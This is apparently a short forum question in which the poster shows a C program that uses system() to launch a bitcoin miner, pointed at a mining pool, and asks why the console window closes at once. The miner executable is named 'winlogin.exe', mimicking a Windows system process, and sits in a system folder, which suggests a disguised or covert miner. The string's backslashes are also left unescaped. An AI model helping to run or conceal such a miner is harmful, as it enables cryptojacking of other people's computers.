i'm trying to run a bitcoin miner trough a system command. Here is the code
#include <windows.h>
int main()
{
system("C:\Windows\AppPatch\Custom\Personal\winlogin.exe -o http://example.pool.com:80 -u user -p password");
}
But the prompt windows apper for a millisecond and close instantly. Any suggest? thanks.